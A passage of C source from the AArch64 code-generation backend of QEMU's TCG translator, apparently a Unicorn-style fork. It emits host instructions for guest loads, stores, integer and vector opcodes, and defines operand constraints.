TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi, TCGType ext) { MemOp memop = get_memop(oi); const TCGType otype = TARGET_LONG_BITS == 64 ? TCG_TYPE_I64 : TCG_TYPE_I32; #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; tcg_out_tlb_read(s, addr_reg, memop, &label_ptr, mem_index, 1); tcg_out_qemu_ld_direct(s, memop, ext, data_reg, TCG_REG_X1, otype, addr_reg); add_qemu_ldst_label(s, true, oi, ext, data_reg, addr_reg, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (USE_GUEST_BASE) { tcg_out_qemu_ld_direct(s, memop, ext, data_reg, TCG_REG_GUEST_BASE, otype, addr_reg); } else { tcg_out_qemu_ld_direct(s, memop, ext, data_reg, addr_reg, TCG_TYPE_I64, TCG_REG_XZR); } #endif /* CONFIG_SOFTMMU */ } static void tcg_out_qemu_st(TCGContext *s, TCGReg data_reg, TCGReg addr_reg, TCGMemOpIdx oi) { MemOp memop = get_memop(oi); const TCGType otype = TARGET_LONG_BITS == 64 ? TCG_TYPE_I64 : TCG_TYPE_I32; #ifdef CONFIG_SOFTMMU unsigned mem_index = get_mmuidx(oi); tcg_insn_unit *label_ptr; tcg_out_tlb_read(s, addr_reg, memop, &label_ptr, mem_index, 0); tcg_out_qemu_st_direct(s, memop, data_reg, TCG_REG_X1, otype, addr_reg); add_qemu_ldst_label(s, false, oi, (memop & MO_SIZE)== MO_64, data_reg, addr_reg, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (USE_GUEST_BASE) { tcg_out_qemu_st_direct(s, memop, data_reg, TCG_REG_GUEST_BASE, otype, addr_reg); } else { tcg_out_qemu_st_direct(s, memop, data_reg, addr_reg, TCG_TYPE_I64, TCG_REG_XZR); } #endif /* CONFIG_SOFTMMU */ } static tcg_insn_unit *tb_ret_addr; static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg args[TCG_MAX_OP_ARGS], const int const_args[TCG_MAX_OP_ARGS]) { /* 99% of the time, we can signal the use of extension registers by looking to see if the opcode handles 64-bit data. */ TCGType ext = (s->tcg_op_defs[opc].flags & TCG_OPF_64BIT) != 0; /* Hoist the loads of the most common arguments. 
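By convention output operands come first in args[], followed by the inputs, so a0..a2 cover most opcodes.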
*/ TCGArg a0 = args[0]; TCGArg a1 = args[1]; TCGArg a2 = args[2]; int c2 = const_args[2]; /* Some operands are defined with "rZ" constraint, a register or the zero register. These need not actually test args[I] == 0. */ #define REG0(I) (const_args[I] ? TCG_REG_XZR : (TCGReg)args[I]) switch (opc) { case INDEX_op_exit_tb: /* Reuse the zeroing that exists for goto_ptr. */ if (a0 == 0) { tcg_out_goto_long(s, s->code_gen_epilogue); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_X0, a0); tcg_out_goto_long(s, tb_ret_addr); } break; case INDEX_op_goto_tb: if (s->tb_jmp_insn_offset != NULL) { /* TCG_TARGET_HAS_direct_jump */ /* Ensure that ADRP+ADD are 8-byte aligned so that an atomic write can be used to patch the target address. */ if ((uintptr_t)s->code_ptr & 7) { tcg_out32(s, NOP); } s->tb_jmp_insn_offset[a0] = tcg_current_code_size(s); /* actual branch destination will be patched by tb_target_set_jmp_target later. */ tcg_out_insn(s, 3406, ADRP, TCG_REG_TMP, 0); tcg_out_insn(s, 3401, ADDI, TCG_TYPE_I64, TCG_REG_TMP, TCG_REG_TMP, 0); } else { /* !TCG_TARGET_HAS_direct_jump */ tcg_debug_assert(s->tb_jmp_target_addr != NULL); intptr_t offset = tcg_pcrel_diff(s, (s->tb_jmp_target_addr + a0)) >> 2; tcg_out_insn(s, 3305, LDR, offset, TCG_REG_TMP); } tcg_out_insn(s, 3207, BR, TCG_REG_TMP); set_jmp_reset_offset(s, a0); break; case INDEX_op_goto_ptr: tcg_out_insn(s, 3207, BR, a0); break; case INDEX_op_br: tcg_out_goto_label(s, arg_label(a0)); break; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: tcg_out_ldst(s, I3312_LDRB, a0, a1, a2, 0); break; case INDEX_op_ld8s_i32: tcg_out_ldst(s, I3312_LDRSBW, a0, a1, a2, 0); break; case INDEX_op_ld8s_i64: tcg_out_ldst(s, I3312_LDRSBX, a0, a1, a2, 0); break; case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: tcg_out_ldst(s, I3312_LDRH, a0, a1, a2, 1); break; case INDEX_op_ld16s_i32: tcg_out_ldst(s, I3312_LDRSHW, a0, a1, a2, 1); break; case INDEX_op_ld16s_i64: tcg_out_ldst(s, I3312_LDRSHX, a0, a1, a2, 1); break; case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: tcg_out_ldst(s, I3312_LDRW, a0, a1, a2, 2); break; case INDEX_op_ld32s_i64: tcg_out_ldst(s, I3312_LDRSWX, a0, a1, a2, 2); break; case INDEX_op_ld_i64: tcg_out_ldst(s, I3312_LDRX, a0, a1, a2, 3); break; case INDEX_op_st8_i32: case INDEX_op_st8_i64: tcg_out_ldst(s, I3312_STRB, REG0(0), a1, a2, 0); break; case INDEX_op_st16_i32: case INDEX_op_st16_i64: tcg_out_ldst(s, I3312_STRH, REG0(0), a1, a2, 1); break; case INDEX_op_st_i32: case INDEX_op_st32_i64: tcg_out_ldst(s, I3312_STRW, REG0(0), a1, a2, 2); break; case INDEX_op_st_i64: tcg_out_ldst(s, I3312_STRX, REG0(0), a1, a2, 3); break; case INDEX_op_add_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_add_i64: if (c2) { tcg_out_addsubi(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3502, ADD, ext, a0, a1, a2); } break; case INDEX_op_sub_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_sub_i64: if (c2) { tcg_out_addsubi(s, ext, a0, a1, -a2); } else { tcg_out_insn(s, 3502, SUB, ext, a0, a1, a2); } break; case INDEX_op_neg_i64: case INDEX_op_neg_i32: tcg_out_insn(s, 3502, SUB, ext, a0, TCG_REG_XZR, a1); break; case INDEX_op_and_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_and_i64: if (c2) { tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, a2); } else { tcg_out_insn(s, 3510, AND, ext, a0, a1, a2); } break; case INDEX_op_andc_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_andc_i64: if (c2) { tcg_out_logicali(s, I3404_ANDI, ext, a0, a1, ~a2); } else { tcg_out_insn(s, 3510, BIC, ext, a0, a1, a2); } break; case INDEX_op_or_i32: a2 = (int32_t)a2; /* FALLTHRU */ 
case INDEX_op_or_i64: if (c2) { tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, a2); } else { tcg_out_insn(s, 3510, ORR, ext, a0, a1, a2); } break; case INDEX_op_orc_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_orc_i64: if (c2) { tcg_out_logicali(s, I3404_ORRI, ext, a0, a1, ~a2); } else { tcg_out_insn(s, 3510, ORN, ext, a0, a1, a2); } break; case INDEX_op_xor_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_xor_i64: if (c2) { tcg_out_logicali(s, I3404_EORI, ext, a0, a1, a2); } else { tcg_out_insn(s, 3510, EOR, ext, a0, a1, a2); } break; case INDEX_op_eqv_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_eqv_i64: if (c2) { tcg_out_logicali(s, I3404_EORI, ext, a0, a1, ~a2); } else { tcg_out_insn(s, 3510, EON, ext, a0, a1, a2); } break; case INDEX_op_not_i64: case INDEX_op_not_i32: tcg_out_insn(s, 3510, ORN, ext, a0, TCG_REG_XZR, a1); break; case INDEX_op_mul_i64: case INDEX_op_mul_i32: tcg_out_insn(s, 3509, MADD, ext, a0, a1, a2, TCG_REG_XZR); break; case INDEX_op_div_i64: case INDEX_op_div_i32: tcg_out_insn(s, 3508, SDIV, ext, a0, a1, a2); break; case INDEX_op_divu_i64: case INDEX_op_divu_i32: tcg_out_insn(s, 3508, UDIV, ext, a0, a1, a2); break; case INDEX_op_rem_i64: case INDEX_op_rem_i32: tcg_out_insn(s, 3508, SDIV, ext, TCG_REG_TMP, a1, a2); tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); break; case INDEX_op_remu_i64: case INDEX_op_remu_i32: tcg_out_insn(s, 3508, UDIV, ext, TCG_REG_TMP, a1, a2); tcg_out_insn(s, 3509, MSUB, ext, a0, TCG_REG_TMP, a2, a1); break; case INDEX_op_shl_i64: case INDEX_op_shl_i32: if (c2) { tcg_out_shl(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, LSLV, ext, a0, a1, a2); } break; case INDEX_op_shr_i64: case INDEX_op_shr_i32: if (c2) { tcg_out_shr(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, LSRV, ext, a0, a1, a2); } break; case INDEX_op_sar_i64: case INDEX_op_sar_i32: if (c2) { tcg_out_sar(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, ASRV, ext, a0, a1, a2); } break; case INDEX_op_rotr_i64: case INDEX_op_rotr_i32: if (c2) { tcg_out_rotr(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3508, RORV, ext, a0, a1, a2); } break; case INDEX_op_rotl_i64: case INDEX_op_rotl_i32: if (c2) { tcg_out_rotl(s, ext, a0, a1, a2); } else { tcg_out_insn(s, 3502, SUB, 0, TCG_REG_TMP, TCG_REG_XZR, a2); tcg_out_insn(s, 3508, RORV, ext, a0, a1, TCG_REG_TMP); } break; case INDEX_op_clz_i64: case INDEX_op_clz_i32: tcg_out_cltz(s, ext, a0, a1, a2, c2, false); break; case INDEX_op_ctz_i64: case INDEX_op_ctz_i32: tcg_out_cltz(s, ext, a0, a1, a2, c2, true); break; case INDEX_op_brcond_i32: a1 = (int32_t)a1; /* FALLTHRU */ case INDEX_op_brcond_i64: tcg_out_brcond(s, ext, a2, a0, a1, const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_setcond_i64: tcg_out_cmp(s, ext, a1, a2, c2); /* Use CSET alias of CSINC Wd, WZR, WZR, invert(cond). 
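   CSINC Rd, Rn, Rm, c yields Rn when c holds, else Rm + 1; with both
   sources being XZR this is c ? 0 : 1, so passing the inverted condition
   produces the 1/0 result that setcond requires.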
*/ tcg_out_insn(s, 3506, CSINC, TCG_TYPE_I32, a0, TCG_REG_XZR, TCG_REG_XZR, tcg_invert_cond(args[3])); break; case INDEX_op_movcond_i32: a2 = (int32_t)a2; /* FALLTHRU */ case INDEX_op_movcond_i64: tcg_out_cmp(s, ext, a1, a2, c2); tcg_out_insn(s, 3506, CSEL, ext, a0, REG0(3), REG0(4), args[5]); break; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, a0, a1, a2, ext); break; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, REG0(0), a1, a2); break; case INDEX_op_bswap64_i64: tcg_out_rev64(s, a0, a1); break; case INDEX_op_bswap32_i64: case INDEX_op_bswap32_i32: tcg_out_rev32(s, a0, a1); break; case INDEX_op_bswap16_i64: case INDEX_op_bswap16_i32: tcg_out_rev16(s, a0, a1); break; case INDEX_op_ext8s_i64: case INDEX_op_ext8s_i32: tcg_out_sxt(s, ext, MO_8, a0, a1); break; case INDEX_op_ext16s_i64: case INDEX_op_ext16s_i32: tcg_out_sxt(s, ext, MO_16, a0, a1); break; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tcg_out_sxt(s, TCG_TYPE_I64, MO_32, a0, a1); break; case INDEX_op_ext8u_i64: case INDEX_op_ext8u_i32: tcg_out_uxt(s, MO_8, a0, a1); break; case INDEX_op_ext16u_i64: case INDEX_op_ext16u_i32: tcg_out_uxt(s, MO_16, a0, a1); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: tcg_out_movr(s, TCG_TYPE_I32, a0, a1); break; case INDEX_op_deposit_i64: case INDEX_op_deposit_i32: tcg_out_dep(s, ext, a0, REG0(2), args[3], args[4]); break; case INDEX_op_extract_i64: case INDEX_op_extract_i32: tcg_out_ubfm(s, ext, a0, a1, a2, a2 + args[3] - 1); break; case INDEX_op_sextract_i64: case INDEX_op_sextract_i32: tcg_out_sbfm(s, ext, a0, a1, a2, a2 + args[3] - 1); break; case INDEX_op_extract2_i64: case INDEX_op_extract2_i32: tcg_out_extr(s, ext, a0, REG0(2), REG0(1), args[3]); break; case INDEX_op_add2_i32: tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), (int32_t)args[4], args[5], const_args[4], const_args[5], false); break; case INDEX_op_add2_i64: tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], args[5], const_args[4], const_args[5], false); break; case INDEX_op_sub2_i32: tcg_out_addsub2(s, TCG_TYPE_I32, a0, a1, REG0(2), REG0(3), (int32_t)args[4], args[5], const_args[4], const_args[5], true); break; case INDEX_op_sub2_i64: tcg_out_addsub2(s, TCG_TYPE_I64, a0, a1, REG0(2), REG0(3), args[4], args[5], const_args[4], const_args[5], true); break; case INDEX_op_muluh_i64: tcg_out_insn(s, 3508, UMULH, TCG_TYPE_I64, a0, a1, a2); break; case INDEX_op_mulsh_i64: tcg_out_insn(s, 3508, SMULH, TCG_TYPE_I64, a0, a1, a2); break; case INDEX_op_mb: tcg_out_mb(s, a0); break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. */ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. 
*/ default: g_assert_not_reached(); } #undef REG0 } static void tcg_out_vec_op(TCGContext *s, TCGOpcode opc, unsigned vecl, unsigned vece, const TCGArg *args, const int *const_args) { static const AArch64Insn cmp_insn[16] = { [TCG_COND_EQ] = I3616_CMEQ, [TCG_COND_GT] = I3616_CMGT, [TCG_COND_GE] = I3616_CMGE, [TCG_COND_GTU] = I3616_CMHI, [TCG_COND_GEU] = I3616_CMHS, }; static const AArch64Insn cmp0_insn[16] = { [TCG_COND_EQ] = I3617_CMEQ0, [TCG_COND_GT] = I3617_CMGT0, [TCG_COND_GE] = I3617_CMGE0, [TCG_COND_LT] = I3617_CMLT0, [TCG_COND_LE] = I3617_CMLE0, }; TCGType type = vecl + TCG_TYPE_V64; unsigned is_q = vecl; TCGArg a0, a1, a2, a3; int cmode, imm8; a0 = args[0]; a1 = args[1]; a2 = args[2]; switch (opc) { case INDEX_op_ld_vec: tcg_out_ld(s, type, a0, a1, a2); break; case INDEX_op_st_vec: tcg_out_st(s, type, a0, a1, a2); break; case INDEX_op_dupm_vec: tcg_out_dupm_vec(s, type, vece, a0, a1, a2); break; case INDEX_op_add_vec: tcg_out_insn(s, 3616, ADD, is_q, vece, a0, a1, a2); break; case INDEX_op_sub_vec: tcg_out_insn(s, 3616, SUB, is_q, vece, a0, a1, a2); break; case INDEX_op_mul_vec: tcg_out_insn(s, 3616, MUL, is_q, vece, a0, a1, a2); break; case INDEX_op_neg_vec: tcg_out_insn(s, 3617, NEG, is_q, vece, a0, a1); break; case INDEX_op_abs_vec: tcg_out_insn(s, 3617, ABS, is_q, vece, a0, a1); break; case INDEX_op_and_vec: if (const_args[2]) { is_shimm1632(~a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, BIC, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MVNI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, AND, is_q, 0, a0, a1, a2); break; case INDEX_op_or_vec: if (const_args[2]) { is_shimm1632(a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, ORR, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MOVI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, ORR, is_q, 0, a0, a1, a2); break; case INDEX_op_andc_vec: if (const_args[2]) { is_shimm1632(a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, BIC, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MOVI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, BIC, is_q, 0, a0, a1, a2); break; case INDEX_op_orc_vec: if (const_args[2]) { is_shimm1632(~a2, &cmode, &imm8); if (a0 == a1) { tcg_out_insn(s, 3606, ORR, is_q, a0, 0, cmode, imm8); return; } tcg_out_insn(s, 3606, MVNI, is_q, a0, 0, cmode, imm8); a2 = a0; } tcg_out_insn(s, 3616, ORN, is_q, 0, a0, a1, a2); break; case INDEX_op_xor_vec: tcg_out_insn(s, 3616, EOR, is_q, 0, a0, a1, a2); break; case INDEX_op_ssadd_vec: tcg_out_insn(s, 3616, SQADD, is_q, vece, a0, a1, a2); break; case INDEX_op_sssub_vec: tcg_out_insn(s, 3616, SQSUB, is_q, vece, a0, a1, a2); break; case INDEX_op_usadd_vec: tcg_out_insn(s, 3616, UQADD, is_q, vece, a0, a1, a2); break; case INDEX_op_ussub_vec: tcg_out_insn(s, 3616, UQSUB, is_q, vece, a0, a1, a2); break; case INDEX_op_smax_vec: tcg_out_insn(s, 3616, SMAX, is_q, vece, a0, a1, a2); break; case INDEX_op_smin_vec: tcg_out_insn(s, 3616, SMIN, is_q, vece, a0, a1, a2); break; case INDEX_op_umax_vec: tcg_out_insn(s, 3616, UMAX, is_q, vece, a0, a1, a2); break; case INDEX_op_umin_vec: tcg_out_insn(s, 3616, UMIN, is_q, vece, a0, a1, a2); break; case INDEX_op_not_vec: tcg_out_insn(s, 3617, NOT, is_q, 0, a0, a1); break; case INDEX_op_shli_vec: tcg_out_insn(s, 3614, SHL, is_q, a0, a1, a2 + (8 << vece)); break; case INDEX_op_shri_vec: tcg_out_insn(s, 3614, USHR, is_q, a0, a1, (16 << vece) - a2); break; case INDEX_op_sari_vec: tcg_out_insn(s, 3614, SSHR, is_q, a0, a1, (16 << vece) - a2); break; case 
INDEX_op_shlv_vec: tcg_out_insn(s, 3616, USHL, is_q, vece, a0, a1, a2); break; case INDEX_op_aa64_sshl_vec: tcg_out_insn(s, 3616, SSHL, is_q, vece, a0, a1, a2); break; case INDEX_op_cmp_vec: { TCGCond cond = args[3]; AArch64Insn insn; if (cond == TCG_COND_NE) { if (const_args[2]) { tcg_out_insn(s, 3616, CMTST, is_q, vece, a0, a1, a1); } else { tcg_out_insn(s, 3616, CMEQ, is_q, vece, a0, a1, a2); tcg_out_insn(s, 3617, NOT, is_q, 0, a0, a0); } } else { if (const_args[2]) { insn = cmp0_insn[cond]; if (insn) { tcg_out_insn_3617(s, insn, is_q, vece, a0, a1); break; } tcg_out_dupi_vec(s, type, TCG_VEC_TMP, 0); a2 = TCG_VEC_TMP; } insn = cmp_insn[cond]; if (insn == 0) { TCGArg t; t = a1, a1 = a2, a2 = t; cond = tcg_swap_cond(cond); insn = cmp_insn[cond]; tcg_debug_assert(insn != 0); } tcg_out_insn_3616(s, insn, is_q, vece, a0, a1, a2); } } break; case INDEX_op_bitsel_vec: a3 = args[3]; if (a0 == a3) { tcg_out_insn(s, 3616, BIT, is_q, 0, a0, a2, a1); } else if (a0 == a2) { tcg_out_insn(s, 3616, BIF, is_q, 0, a0, a3, a1); } else { if (a0 != a1) { tcg_out_mov(s, type, a0, a1); } tcg_out_insn(s, 3616, BSL, is_q, 0, a0, a2, a3); } break; case INDEX_op_mov_vec: /* Always emitted via tcg_out_mov. */ case INDEX_op_dupi_vec: /* Always emitted via tcg_out_movi. */ case INDEX_op_dup_vec: /* Always emitted via tcg_out_dup_vec. */ default: g_assert_not_reached(); } } int tcg_can_emit_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece) { switch (opc) { case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_and_vec: case INDEX_op_or_vec: case INDEX_op_xor_vec: case INDEX_op_andc_vec: case INDEX_op_orc_vec: case INDEX_op_neg_vec: case INDEX_op_abs_vec: case INDEX_op_not_vec: case INDEX_op_cmp_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: case INDEX_op_shlv_vec: case INDEX_op_bitsel_vec: return 1; case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: return -1; case INDEX_op_mul_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: return vece < MO_64; default: return 0; } } void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg a0, ...) { va_list va; TCGv_vec v0, v1, v2, t1; va_start(va, a0); v0 = temp_tcgv_vec(tcg_ctx, arg_temp(a0)); v1 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); v2 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); switch (opc) { case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: /* Right shifts are negative left shifts for AArch64. */ t1 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_neg_vec(tcg_ctx, vece, t1, v2); opc = (opc == INDEX_op_shrv_vec ? 
INDEX_op_shlv_vec : INDEX_op_aa64_sshl_vec); vec_gen_3(tcg_ctx, opc, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, t1)); tcg_temp_free_vec(tcg_ctx, t1); break; default: g_assert_not_reached(); } va_end(va); } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef w_w = { .args_ct_str = { "w", "w" } }; static const TCGTargetOpDef w_r = { .args_ct_str = { "w", "r" } }; static const TCGTargetOpDef w_wr = { .args_ct_str = { "w", "wr" } }; static const TCGTargetOpDef r_l = { .args_ct_str = { "r", "l" } }; static const TCGTargetOpDef r_rA = { .args_ct_str = { "r", "rA" } }; static const TCGTargetOpDef rZ_r = { .args_ct_str = { "rZ", "r" } }; static const TCGTargetOpDef lZ_l = { .args_ct_str = { "lZ", "l" } }; static const TCGTargetOpDef r_r_r = { .args_ct_str = { "r", "r", "r" } }; static const TCGTargetOpDef w_w_w = { .args_ct_str = { "w", "w", "w" } }; static const TCGTargetOpDef w_w_wO = { .args_ct_str = { "w", "w", "wO" } }; static const TCGTargetOpDef w_w_wN = { .args_ct_str = { "w", "w", "wN" } }; static const TCGTargetOpDef w_w_wZ = { .args_ct_str = { "w", "w", "wZ" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_r_rA = { .args_ct_str = { "r", "r", "rA" } }; static const TCGTargetOpDef r_r_rL = { .args_ct_str = { "r", "r", "rL" } }; static const TCGTargetOpDef r_r_rAL = { .args_ct_str = { "r", "r", "rAL" } }; static const TCGTargetOpDef dep = { .args_ct_str = { "r", "0", "rZ" } }; static const TCGTargetOpDef ext2 = { .args_ct_str = { "r", "rZ", "rZ" } }; static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "rA", "rZ", "rZ" } }; static const TCGTargetOpDef add2 = { .args_ct_str = { "r", "r", "rZ", "rZ", "rA", "rMZ" } }; static const TCGTargetOpDef w_w_w_w = { .args_ct_str = { "w", "w", "w", "w" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8s_i32: case INDEX_op_ld16u_i32: case INDEX_op_ld16s_i32: case INDEX_op_ld_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i64: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_neg_i32: case INDEX_op_neg_i64: case INDEX_op_not_i32: case INDEX_op_not_i64: case INDEX_op_bswap16_i32: case INDEX_op_bswap32_i32: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_ext8s_i32: case INDEX_op_ext16s_i32: case INDEX_op_ext8u_i32: case INDEX_op_ext16u_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext16s_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext8u_i64: case INDEX_op_ext16u_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extract_i32: case INDEX_op_extract_i64: case INDEX_op_sextract_i32: case INDEX_op_sextract_i64: return &r_r; case INDEX_op_st8_i32: case INDEX_op_st16_i32: case INDEX_op_st_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i64: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &rZ_r; case INDEX_op_add_i32: case INDEX_op_add_i64: case INDEX_op_sub_i32: case INDEX_op_sub_i64: case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: return &r_r_rA; case INDEX_op_mul_i32: case INDEX_op_mul_i64: case INDEX_op_div_i32: case INDEX_op_div_i64: case INDEX_op_divu_i32: case INDEX_op_divu_i64: case INDEX_op_rem_i32: case INDEX_op_rem_i64: case 
INDEX_op_remu_i32: case INDEX_op_remu_i64: case INDEX_op_muluh_i64: case INDEX_op_mulsh_i64: return &r_r_r; case INDEX_op_and_i32: case INDEX_op_and_i64: case INDEX_op_or_i32: case INDEX_op_or_i64: case INDEX_op_xor_i32: case INDEX_op_xor_i64: case INDEX_op_andc_i32: case INDEX_op_andc_i64: case INDEX_op_orc_i32: case INDEX_op_orc_i64: case INDEX_op_eqv_i32: case INDEX_op_eqv_i64: return &r_r_rL; case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: case INDEX_op_rotl_i32: case INDEX_op_rotr_i32: case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: case INDEX_op_rotl_i64: case INDEX_op_rotr_i64: return &r_r_ri; case INDEX_op_clz_i32: case INDEX_op_ctz_i32: case INDEX_op_clz_i64: case INDEX_op_ctz_i64: return &r_r_rAL; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_rA; case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: return &movc; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: return &r_l; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: return &lZ_l; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: return &dep; case INDEX_op_extract2_i32: case INDEX_op_extract2_i64: return &ext2; case INDEX_op_add2_i32: case INDEX_op_add2_i64: case INDEX_op_sub2_i32: case INDEX_op_sub2_i64: return &add2; case INDEX_op_add_vec: case INDEX_op_sub_vec: case INDEX_op_mul_vec: case INDEX_op_xor_vec: case INDEX_op_ssadd_vec: case INDEX_op_sssub_vec: case INDEX_op_usadd_vec: case INDEX_op_ussub_vec: case INDEX_op_smax_vec: case INDEX_op_smin_vec: case INDEX_op_umax_vec: case INDEX_op_umin_vec: case INDEX_op_shlv_vec: case INDEX_op_shrv_vec: case INDEX_op_sarv_vec: case INDEX_op_aa64_sshl_vec: return &w_w_w; case INDEX_op_not_vec: case INDEX_op_neg_vec: case INDEX_op_abs_vec: case INDEX_op_shli_vec: case INDEX_op_shri_vec: case INDEX_op_sari_vec: return &w_w; case INDEX_op_ld_vec: case INDEX_op_st_vec: case INDEX_op_dupm_vec: return &w_r; case INDEX_op_dup_vec: return &w_wr; case INDEX_op_or_vec: case INDEX_op_andc_vec: return &w_w_wO; case INDEX_op_and_vec: case INDEX_op_orc_vec: return &w_w_wN; case INDEX_op_cmp_vec: return &w_w_wZ; case INDEX_op_bitsel_vec: return &w_w_w_w; default: return NULL; } } static void tcg_target_init(TCGContext *s) { s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffffu; s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffffu; s->tcg_target_available_regs[TCG_TYPE_V64] = 0xffffffff00000000ull; s->tcg_target_available_regs[TCG_TYPE_V128] = 0xffffffff00000000ull; s->tcg_target_call_clobber_regs = -1ull; tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X19); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X20); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X21); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X22); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X23); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X24); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X25); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X26); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X27); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X28); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_X29); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V8); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V9); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V10); tcg_regset_reset_reg(s->tcg_target_call_clobber_regs, TCG_REG_V11); 
